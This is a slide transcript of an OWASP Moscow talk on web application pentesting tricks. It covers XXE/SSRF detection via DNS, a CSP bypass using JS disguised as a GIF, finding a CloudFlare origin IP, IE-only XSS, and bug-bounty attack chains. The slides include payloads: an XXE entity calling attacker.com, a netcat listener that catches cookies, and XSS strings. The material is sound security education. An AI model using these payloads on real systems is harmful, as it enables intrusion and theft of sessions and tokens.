Upgrade to Pro — share decks privately, control downloads, hide ads and more …

"Трюки при анализе защищенности веб приложений – продвинутая версия", Сергей Белов

"Трюки при анализе защищенности веб приложений – продвинутая версия", Сергей Белов

OWASP Russia Meetup #1

47a3212bc9721c62f1135ead56569f17?s=128

OWASP Moscow

December 04, 2017
Tweet

Transcript

  1. Трюки при анализе защищенности веб-приложений - продвинутая версия Сергей Белов

    Digital Security OWASP Moscow, 6 Dec 2014
  2. Work/Activity BugHuting Speaker Hey 2

  3. XXE/SSRF detection via DNS

  4. XXE/SSRF detection via DNS SSRF: 1) Предложить сайт <ссылка на

    сайт> 2) Бот проверяет сайт 3) Вместо внешнего сайта подставляется локальный адрес / заменяется схема (file:///)
  5. XXE/SSRF detection via DNS XXE: 1) XML <?xml version="1.0" encoding="ISO-8859-1"?>

    2) С сущностью <!ENTITY xxe SYSTEM «http://attacker.com» >]> 3) Парсер пытается подгрузить сущность с внешнего сайта
  6. XXE/SSRF detection via DNS Сложности при поиске: 1) Есть или

    нет? 2) Время запроса 3) Firewall 4) Другие ограничения
  7. XXE/SSRF detection via DNS DNS leak DNS server

  8. XXE/SSRF detection via DNS В ссылке есть домен -> должен

    быть resolve домена
  9. XXE/SSRF detection via DNS Инструкция 1) Свой сервер (VPS) –

    12.34.56.78 1) Ставим attacker.com свои NS сервера NS1: 12.34.56.78; NS2: 12.34.56.78 2) dnschef 3) python dnschef.py -i 0.0.0.0
  10. XXE/SSRF detection via DNS Реальный пример Говорят – переходит по

    ссылкам в чате...
  11. XXE/SSRF detection via DNS Сценарий 1 1) User 1 ->

    User 2 http://skype-example.com 2) # cat access.log | grep “skype-example” | wc –l 3) 0 
  12. XXE/SSRF detection via DNS Сценарий 2 – DNS Поймали :]

  13. CSP bypass – js as image

  14. CSP bypass – js as image

  15. CSP bypass – js as image Картинка == js файл

    Gif injector - http://pastebin.com/6yUbfGX5
  16. CSP bypass – js as image 1) Возможность загружать файлы

    на разрешенные домены в CSP 2) Загрузить картинку<->js и сделать инклуд <script src=“.../image.gif”></script> Свежие хромы научились блочить подобное 
  17. CloudFlare – real IP detection

  18. CloudFlare – real IP detection

  19. CloudFlare – real IP detection

  20. CloudFlare – real IP detection CloudFlare Free, Pro and Business

    plan: We do not proxy wildcard records CloudFlare Enterprise: For CloudFlare Enterprise customers, we do proxy wildcard records
  21. CloudFlare – real IP detection ping randoOm.victim.com => REAL IP

  22. XSS && urlencode

  23. XSS & urlencode Web Server ?xss=<script>alert(1)</script>

  24. XSS & urlencode 1) Не все web серверы выполняют urldecode

    2)  XSS подставляется, но после urlencode 3) XSS не выполняется  4) На помощь приходит... IE!
  25. XSS & urlencode Только после знака вопроса

  26. XSS & urlencode А если... http://domain.com/path/<xss_here>/etc/

  27. XSS & urlencode http://domain.com/path/<xss>/etc/ IE Only (v11 inc): header("Location: http://domain.com/path/<xss>/etc/");

  28. XSS & urlencode

  29. SQLmap

  30. SQLmap

  31. SQLmap -u http://vuln.com/vote.php --data="id=1&hash=2“ --eval="import hashlib;hash=hashlib.md5(‘123$id456').hexdigest()"

  32. Сложных ситуации - bugbounty

  33. Situation #1 – Same Site Scripting XXXYYYZZZ.target.com => 127.0.0.1 What’s

    wrong?
  34. Situation #1 – Same Site Scripting

  35. Situation #1 – Same Site Scripting External IP – 12.34.56.78

    Loopback – 127.0.0.1
  36. Situation #1 – Same Site Scripting Attacker: 1) nc –lv

    10024 2) email to victim@corp.xxx with <img src = http://xxyyzz.target.com:10024 > Victim: 1) Open email and... 2) Load image with *.target.com cookies! (that’s is why important to know howto correctly set cookies - http://habrahabr.ru/post/143276/)
  37. Situation #1 – Same Site Scripting http://localhost.domain.com:631/<SCRIPT>XSS</SCRIPT>.s html

  38. Situation #1 – Same Site Scripting 38 XXXYYYZZZ.target.com => 10.0.0.22

    http://lab.onsec.ru/2013/07/insecure-dns-records-in-top-web-projects.html
  39. Situation #1 – Same Site Scripting 39 https://hackerone.com/reports/1509 - $100

  40. Situation #2 – Self XSS

  41. Situation #2 – Self XSS XSS only for you –

    no impact?
  42. Situation #2 – Self XSS

  43. Situation #2 – Self XSS Requirements: 1)CSRF for logout O_o

    2)CSRF for login o_O
  44. Situation #2 – Self XSS Steps: 1) Save (self)XSS for

    you 2) Logout victim 3) Login victim w/ your creds 4) Draw window 5) Catch user’s creds!
  45. Situation #2 – Self XSS Google and self-XSS

  46. Situation #2 – Self XSS Share account and attack your

    victim
  47. Situation #3 – evil HTTP referers

  48. Situation #3 - HTTP referer <a href=“http://external.com”>Go!</a> In request headers:

    ... Referer: http://yoursite.com/ ... But what about external resources on web page such as images, styles...?
  49. Situation #3 - HTTP referer http://super-website.com/user/passRecovery?t=SECRET ... <img src=http://comics-are-awesome.com/howto-choose- password.jpg>

    ... Owner of comics-are-awesome.com know all _SECRET_ tokens (from referer)!
  50. Situation #3 - HTTP referer https://hackerone.com/reports/738 - $100

  51. Situation #5 - Content-Security-Policy

  52. Situation #5 - Content-Security-Policy

  53. Situation #5 - Content-Security-Policy CSP only for some browsers! Is

    it ok?
  54. Situation #5 - Content-Security-Policy 1) Forks with diff UA 2)

    Proxy cache 3) Load balancer... Bug hunter got $100, but...
  55. Situation #5 - Content-Security-Policy Fail! Why: • ‘Partial support in

    Internet Explorer 10-11 refers to the browser only supporting the 'sandbox' directive by using the 'X-Content-Security-Policy' header. • Partial support in iOS Safari 5.0-5.1 refers to the browser recognizing the X-Webkit-CSP header but failing to handle complex cases correctly, often resulting in broken pages. • Chrome for iOS fails to render pages without a connect-src 'self' policy. • Old FF problems (some versions between XX and YY)
  56. Situation #6 - Usernames

  57. Situation #6 - Usernames http://website.com/username

  58. Situation #6 - Usernames Okay! Let’s register: http://website.com/robots.txt http://website.com/sitemap.xml ...

  59. Situations XXX

  60. Situations XXX • Info disclose via CSS files (full path

    disclosure while compilation - file\:\/\/\/applications\/hackerone\/releases\/201402211759 29\/app\/assets\/stylesheets\/application\/browser-not- supported\.scss (bug #2221) • SPF and same records • Short tokens • Pixel flood attack • CSRF for login/logout!? (hi Michal Zalewski!) • ... - https://hackerone.com/security?show_all=true
  61. Thanks! Questions? @sergeybelove